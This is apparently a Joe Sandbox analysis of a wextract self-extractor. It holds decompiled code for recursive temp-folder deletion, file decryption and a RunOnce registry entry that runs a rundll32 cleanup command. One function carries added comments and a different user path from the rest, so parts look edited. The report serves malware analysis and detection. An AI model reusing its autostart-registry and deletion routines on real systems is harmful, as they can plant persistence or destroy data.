                                                                                                                                                                                                      0x000e2f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 000E2FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 000E2FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 000E2FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000E2FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E301C
                                                                                                                                                                                                        • Part of subcall function 000E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F4D,?,00000002,00000000), ref: 000E5201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-2196669084
                                                                                                                                                                                                      • Opcode ID: a1c31566dbb461bf88e662cea3b895c015e94cd2a125b6041e45cc142ca0c0a9
                                                                                                                                                                                                      • Instruction ID: caee5014964f86b44252f9e93f96be5b1a090ed7298f4b92587c09f22530dea7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c31566dbb461bf88e662cea3b895c015e94cd2a125b6041e45cc142ca0c0a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A41DE31A002C58EFB70AB339D9D69A3BE89B54B50F044075EA15F7192EF78CE80C751
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 648 e2390-e23b3 649 e24cb-e24df call e6ce0 648->649 650 e23b9-e23bc 648->650 650->649 651 e23c2-e2401 call e1680 call e16b3 FindFirstFileA 650->651 651->649 658 e2407-e241f call e1680 651->658 661 e2479-e24a3 call e16b3 SetFileAttributesA DeleteFileA 658->661 662 e2421-e242f lstrcmpA 658->662 664 e24a9-e24b7 FindNextFileA 661->664 662->664 665 e2431-e2443 lstrcmpA 662->665 664->658 667 e24bd-e24c5 FindClose RemoveDirectoryA 664->667 665->664 668 e2445-e2477 call e16b3 call e658a call e2390 665->668 667->649 668->664
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E2390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E000E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E000E16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E000E1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E000E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E000E16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E000E658A( &_v280, 0x104, 0xe1140);
                                                                                                                                                                                                      								E000E2390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,000E8A3A,000E11F4,000E8A3A,00000000,?,?), ref: 000E23F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,000E11F8), ref: 000E2427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,000E11FC), ref: 000E243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 000E2495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 000E24A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000E24AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 000E24BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(000E8A3A), ref: 000E24C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 5e323bea84e603799dc9bc876d52c44c9bfe87dcb5b19dd203d2e66b4e2ebe76
                                                                                                                                                                                                      • Instruction ID: 63a628905575f06024a1f5bda5c9cfc2033a2d41518d288d2d1e3759d567c3b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e323bea84e603799dc9bc876d52c44c9bfe87dcb5b19dd203d2e66b4e2ebe76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2631C4723047C09FD320EBA5CC89EEB73ECAFC9701F04492DB555AA191EB38A909C752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E000E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xea288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xe9124 = 0;
                                                                                                                                                                                                      				if(E000E2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E000E2F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E000E52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xe8a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xe9a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E000E1F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xe8588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xe9124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 000E2C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: ad90d3f53b8fcad4ca02039a90a3ef6dc26aa8c1754c2be441ea148811d9eaa8
                                                                                                                                                                                                      • Instruction ID: 63ce3c8f92ec5c06e53b66e176c200377aea61bcbad14f15b2f00eb8544a9b24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad90d3f53b8fcad4ca02039a90a3ef6dc26aa8c1754c2be441ea148811d9eaa8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 371129313003C59FE7246BB7ECC8AAF379D9B88B80B140029F904FB251CA38FC418661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E6F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E000E6EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x000e6f45
                                                                                                                                                                                                      0x000e6f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 000E6F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 7bda914cf197cde556fb568b54ec8e37d290d4c93f90d38de3e6fed76a8ce21a
                                                                                                                                                                                                      • Instruction ID: 7e79da3f08ac77b20c67d38b96f9a14ef1d912632a58cad98e7d42d0c8eea4d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bda914cf197cde556fb568b54ec8e37d290d4c93f90d38de3e6fed76a8ce21a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 539002643511804BA6101B71AD5942579915B5FA42B8154A1B111EC5D4DB6550405512
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
E000E202A(struct HINSTANCE__* __edx) {
	signed int _v8;
	char _v268;
	char _v528;
	void* _v532;
	int _v536;
	int _v540;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t28;
	long _t36;
	long _t41;
	struct HINSTANCE__* _t46;
	intOrPtr _t49;
	intOrPtr _t50;
	CHAR* _t54;
	void _t56;
	signed int _t66;
	intOrPtr* _t72;
	void* _t73;
	void* _t75;
	void* _t80;
	intOrPtr* _t81;
	void* _t86;
	void* _t87;
	void* _t90;
	_Unknown_base(*)()* _t91;
	signed int _t93;
	void* _t94;
	void* _t95;

	_t79 = __edx;
	_t28 =  *0xe8004; // 0xb7c20988
	_v8 = _t28 ^ _t93;
	_t84 = 0x104;
	memset( &_v268, 0, 0x104);
	memset( &_v528, 0, 0x104);
	_t95 = _t94 + 0x18;
	_t66 = 0;
	// 0x80000002 = HKEY_LOCAL_MACHINE, 0x2001f = KEY_READ | KEY_WRITE: open or create the RunOnce key.
	_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
	if(_t36 != 0) {
		L24:
		return E000E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
	}
	_push(_t86);
	_t87 = 0;
	// Probe value names built from "wextract_cleanup%d" for indices 0..199 (0xc8 = 200);
	// the loop stops at the first name whose query fails, i.e. the first free slot.
	while(1) {
		E000E171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
		_t95 = _t95 + 0x10;
		_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
		if(_t41 != 0) {
			break;
		}
		_t87 = _t87 + 1;
		if(_t87 < 0xc8) {
			continue;
		}
		break;
	}
	if(_t87 != 0xc8) {
		// A free value name was found: load advpack.dll from the system directory
		// and check whether it exports DelNodeRunDLL32.
		GetSystemDirectoryA( &_v528, _t84);
		_t79 = _t84;
		E000E658A( &_v528, _t84, "advpack.dll");
		_t46 = LoadLibraryA( &_v528); // executed
		_t84 = _t46;
		if(_t84 == 0) {
			L10:
			if(GetModuleFileNameA( *0xe9a3c,  &_v268, 0x104) == 0) {
				L17:
				_t36 = RegCloseKey(_v532);
				L23:
				_pop(_t86);
				goto L24;
			}
			L11:
			// Inlined string-length loops: size the buffer for the command line.
			_t72 =  &_v268;
			_t80 = _t72 + 1;
			do {
				_t49 =  *_t72;
				_t72 = _t72 + 1;
			} while (_t49 != 0);
			_t73 = _t72 - _t80;
			_t81 = 0xe91e4;
			do {
				_t50 =  *_t81;
				_t81 = _t81 + 1;
			} while (_t50 != 0);
			_t84 = _t73 + 0x50 + _t81 - 0xe91e5;
			_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe91e5);
			if(_t90 != 0) {
				 *0xe8580 = _t66 ^ 0x00000001;
				// _t66 is 1 when DelNodeRunDLL32 was resolved: use the rundll32 form, otherwise "%s /D:%s".
				_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
				if(_t66 == 0) {
					_t54 = "%s /D:%s";
				}
				_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
				E000E171E(_t90, _t84, _t54,  &_v268);
				_t75 = _t90;
				_t23 = _t75 + 1; // 0x1
				_t79 = _t23;
				do {
					_t56 =  *_t75;
					_t75 = _t75 + 1;
				} while (_t56 != 0);
				_t24 = _t75 - _t79 + 1; // 0x2
				// Type 1 = REG_SZ: the formatted command line is stored under the RunOnce value name.
				RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
				RegCloseKey(_v532); // executed
				_t36 = LocalFree(_t90);
				goto L23;
			}
			_t79 = 0x4b5;
			E000E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
			goto L17;
		}
		_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
		_t66 = 0 | _t91 != 0x00000000;
		FreeLibrary(_t84); // executed
		if(_t91 == 0) {
			goto L10;
		}
		if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
			E000E658A( &_v268, 0x104, 0xe1140);
		}
		goto L11;
	}
	// All 200 value names are already in use: close the key without writing.
	_t36 = RegCloseKey(_v532);
	 *0xe8530 = _t66;
	goto L23;
}

                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e20da
                                                                                                                                                                                                      0x000e20e2
                                                                                                                                                                                                      0x000e2103
                                                                                                                                                                                                      0x000e210e
                                                                                                                                                                                                      0x000e2116
                                                                                                                                                                                                      0x000e2122
                                                                                                                                                                                                      0x000e2128
                                                                                                                                                                                                      0x000e212c
                                                                                                                                                                                                      0x000e2179
                                                                                                                                                                                                      0x000e2194
                                                                                                                                                                                                      0x000e21de
                                                                                                                                                                                                      0x000e21e4
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x000e2196
                                                                                                                                                                                                      0x000e2196
                                                                                                                                                                                                      0x000e219c
                                                                                                                                                                                                      0x000e219f
                                                                                                                                                                                                      0x000e219f
                                                                                                                                                                                                      0x000e21a1
                                                                                                                                                                                                      0x000e21a2
                                                                                                                                                                                                      0x000e21a6
                                                                                                                                                                                                      0x000e21a8
                                                                                                                                                                                                      0x000e21b0
                                                                                                                                                                                                      0x000e21b0
                                                                                                                                                                                                      0x000e21b2
                                                                                                                                                                                                      0x000e21b3
                                                                                                                                                                                                      0x000e21bc
                                                                                                                                                                                                      0x000e21c7
                                                                                                                                                                                                      0x000e21cb
                                                                                                                                                                                                      0x000e21f1
                                                                                                                                                                                                      0x000e21f6
                                                                                                                                                                                                      0x000e21fd
                                                                                                                                                                                                      0x000e21ff
                                                                                                                                                                                                      0x000e21ff
                                                                                                                                                                                                      0x000e2204
                                                                                                                                                                                                      0x000e2213
                                                                                                                                                                                                      0x000e2218
                                                                                                                                                                                                      0x000e221d
                                                                                                                                                                                                      0x000e221d
                                                                                                                                                                                                      0x000e2220
                                                                                                                                                                                                      0x000e2220
                                                                                                                                                                                                      0x000e2222
                                                                                                                                                                                                      0x000e2223
                                                                                                                                                                                                      0x000e2229
                                                                                                                                                                                                      0x000e223d
                                                                                                                                                                                                      0x000e2249
                                                                                                                                                                                                      0x000e2250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2250
                                                                                                                                                                                                      0x000e21d2
                                                                                                                                                                                                      0x000e21d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e21d9
                                                                                                                                                                                                      0x000e213a
                                                                                                                                                                                                      0x000e2141
                                                                                                                                                                                                      0x000e2144
                                                                                                                                                                                                      0x000e214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2163
                                                                                                                                                                                                      0x000e2172
                                                                                                                                                                                                      0x000e2172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2163
                                                                                                                                                                                                      0x000e20ea
                                                                                                                                                                                                      0x000e20f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2050
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 000E208C
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E20C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E20EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 000E2134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E21C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E21E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 000E223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 178549006-455997452
                                                                                                                                                                                                      • Opcode ID: dd90f71f8d250ebdf23fd860340b951453f290107f4b61ba449ed3875bdc934d
                                                                                                                                                                                                      • Instruction ID: ee9796a254b9d82d28c92a5d65aa7c86f04d3e1b4121b6d09e0edf91bb60822d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd90f71f8d250ebdf23fd860340b951453f290107f4b61ba449ed3875bdc934d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF513972A00294AFEB209B22DC89FFB777CEB55B40F0041E8FA09FB151DA759E448B50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
